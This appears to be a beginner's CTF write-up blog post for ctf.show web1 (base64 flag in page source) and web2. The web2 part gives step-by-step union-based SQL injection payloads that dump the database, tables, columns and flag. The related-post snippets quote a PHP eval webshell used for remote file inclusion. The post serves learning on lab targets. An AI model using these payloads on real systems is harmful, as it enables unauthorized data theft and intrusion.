ctf.show web笔记

已于 2022-09-02 18:32:36 修改
阅读量151 收藏
点赞数 2
文章标签: 前端 数据库 mysql
于 2022-08-28 02:48:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61993117/article/details/126565149
版权

ctf.show web笔记

记录一些web的知识点,本人才刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点

web1

一道简单的入门题

打开环境发现只有一串英文,flag在哪

按CTRL+u查看源码发现一串字符串:Y3Rmc2hvd3s4YTcwYzcxOS04NmQwLTQ0MTAtOTBjYS0zMjdkNjkxOWQyYzN9

vWmReA.png

根据特征发现是base64,到在线网站去解密得到flag

vWm4FP.md.png

flag:ctfshow{8a70c719-86d0-4410-90ca-327d6919d2c3}

web2

提供一些SQL的知识点:

Tables_name:表名

Information_schema.tables:储存MySQL数据库下面的所有表明信息表

Column_name:列名

Information_schema.columns:储存MySQL数据库下面的所有列名信息的表

打开环境是一个登陆界面,输入用户名输入admin,密码随便输入(我输入的是123),然后用burp进行抓包

vWnkwR.png

vWnZY6.png

然后把抓取到的数据发送到Repeater模块,试一下万能密码:’or 1=1#

username=admin’or 1=1#&password=123 发现登录成功(有回显)

vWnMOH.png

接着查看回显位置:username=admin’or 1=1 union select 1,2,3#&password=123

vWn10A.png

有回显,查找2中的数据库名:username=admin’or 1=1 union select 1,database(),3#&password=123

vWnGkt.png

发现数据库位于web2,查询web2库下的所有表名:username=admin’or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#&password=123

vWnYff.png

查询flag表下的列名,回显列名flag:username=admin’or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#&password=123

vWnNp8.png

最后查询列名内容,找到flag:username=admin’or 1=1 union select 1,flag,3 from flag#&password=123

vWna6g.png
flag:ctfshow{26b1461e-0971-4c2f-9d3a-6230e61cfdb8}

苏落不会打CTF
关注
ctf.show与学习笔记
Q221022的博客
01-29 3159
ctf.show 1.密码学签到 看到密文之后不难发现,flag就是倒着写的,直接将密文倒叙输出就是答案 2. 看到题目,全是由符号组成的,将题目内容全部复制到控制台,回车即可得到答案 3. 第三题与第二题看起来是一样的,所以先将其复制到控制台,发现报错了,有中文的引号,将所有的引号全部换成英文之后还是没有得到flag,········(不会了,没有思路了) 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...
ctf.show web web1-web10
qq_61993117的博客
09-17 1906
记录一些web的知识点,本人刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点。
【ctf.show-web赛题】
一纸荒芜的博客
03-21 2808
主要分享自己做题的心得和积累,共勉之。
ctf_show笔记篇(web入门---文件上传)
whale_waves的博客
03-06 909
这里利用.user.ini文件,只要访问同目录下的php文件就能把目标png文件当作php文件加载。可以直接写payload获得flag,不用在继续$_POST之类的。自行搜索绕过一下其他的和153题无异。这里就关系到了网站中间件的设置问题。使用GIF89a在文件最上方添加。但是会验证图片头信息。
ctf.show 通关秘籍
qq_37970270的博客
09-13 1452
@ CTF.show 1.web签到题 访问web签到题的地址,发现页面只有"where is flag"字样 使用Fn+F12进入调试模式,或者页面空白处点击右键查看网页源代码,发现页面中有一段英文字符串被注释了,根据编码规则猜测使用的是base64的加密方式。 使用解码平台尝试解码,示例使用站长之家,成功获取到flag。(url:http://tool.chinaz.com/tools/base64.aspx) ...
ROSE笔记-ctf.show_web10-WP
居上
11-08 307
ctf.show_web10 点取消按钮,查看到源代码 <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if (!$co
ctf_show笔记篇(web入门---jwt)
whale_waves的博客
04-02 1489
JSON Web Token(JWT)通常由三部分组成简单地说jwt就是一串字符串,类似于序列化这种,把用户的信息保存在字符串里JWT全称是,如果从字面上理解感觉是基于JSON格式用于网络传输的令牌。实际上,JWT是一种紧凑的Claims声明格式,旨在用于空间受限的环境进行传输,常见的场景如HTTP授权请求头参数和URI查询参数。JWT会把Claims转换成JSON格式,而这个JSON内容将会应用为JWS结构的有效载荷或者应用为JWE结构的(加密处理后的)原始字符串,通过消息认证码(或者简称MAC。
ctf_show笔记篇(web入门---php特性)
whale_waves的博客
03-02 1308
原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL。如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。
ROSE笔记-ctf.show-web4-WP
居上
11-06 323
ctf.show-web4 试以下伪协议 payload:/?url=php://input 页面显示错误 方法一:远程文件包含 打开一台携带web服务的云服务器,在目录下创建一个test.php,内容为一句话木马 <?php @eval($_POST['1']); ?> http://xxx/test.php ...
2024年最新ctfshow-WEB-web6_ctf(2)
2301_82056337的博客
05-03 181
接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错。很明显flag就在flag这个表中,接下来我们获取flag表的所有字段,用户名输入以下payload,密码随便输,如果直接赋值payload,记得删掉内容中的空格和换行符,否则会报错。接下来就是获取flag表中的数据了,用户名输入以下payload,密码随便输。成功获取数据库中的表 flag , user。
2024年最新ctfshow-WEB-web9( MD5加密漏洞绕过)_ctfshow web9(1),网络安全架构师必备框架技能核心笔记
2401_84301227的博客
05-06 743
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
ctfshow-sqli-libs笔记(web517-web539)
Yasso的博客
09-08 643
> 好久没做基础的sql注入题了,平台上发现sqli-libs,网课无聊打一下 发布后自动把我的单引号改成了中文格式,不知道为啥 web517 {字符型注入-联合查询} id=1’ and 1=1–+ 正常回显 id=1’ and 1=2–+ 异常回显 id=0’ order by 3–+ 查询字段数为3 id=0’ union select 1,2,database()–+ 爆出当前数据库为security—真正flag在ctfshow数据库里… id=0’ union select 1
CTF解题-web
qq_42936836的博客
08-24 5761
记录的一些CTFweb题目~~~
前端的全栈混合之路Meteor篇:3.0新版本介绍
分享有趣的、贴近生活的CS知识
10-01 1118
Meteor全栈框架3.0版本终于稳定下来了,它的效果约等于webpack+vue+express+socket.io+mongodb+npm+uniapp,学一个搞定全套,值得学习了解下,最后找到适合于自己的技术栈。
Vue根实例、实例总结
最新发布
m0_54007573的博客
10-04 472
Vue根实例、实例总结
Javascript数组研究03_手写实现_fill_filter_find_findIndex_findLast_findLastIndex
qq_33546823的博客
10-03 1193
fill()方法用一个固定值填充一个数组中从起始索引(默认为 0)到终止索引(默认为)内的全部元素。它返回修改后的数组。输入参数value:用来填充数组元素的值。start(可选):开始填充的位置,默认值为 0,索引处理方法和copyWithin一致。end(可选):停止填充的位置(不包含该位置),默认值为,索引处理方法和copyWithin方法一致。输出:修改后的原数组。注意事项该方法会改变原数组,是修改方法。对于稀疏数组,空槽也会被value填充。是通用的方法在空数组上不会有任何处理。
登录功能开发 P167重点
2303_81204446的博客
09-30 423
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
Web认识 -- 第一课
ZxVSaccount的博客
09-30 1215
这里是我们进入前端学习的开端,在本次更新之后我会陆续上传html,css,javaScript等相关语言的教程,有感兴趣的小伙伴们点点关注,未来我们一起学习!IE、火狐和谷歌是目前互联网上的三大浏览器,其他常用的浏览器还有苹果的Safari浏览器和欧朋浏览器等。对于一般的网站,只要兼容IE浏览器、火狐浏览器和谷歌浏览器,就能满足绝大多数用户的需求。本节主要简单介绍了一下关于HTML、CSS、JavaScript的一些基本概念,有感兴趣的朋友,点点关注我们一起学习,博主持续更新中!
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苏落不会打CTF

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值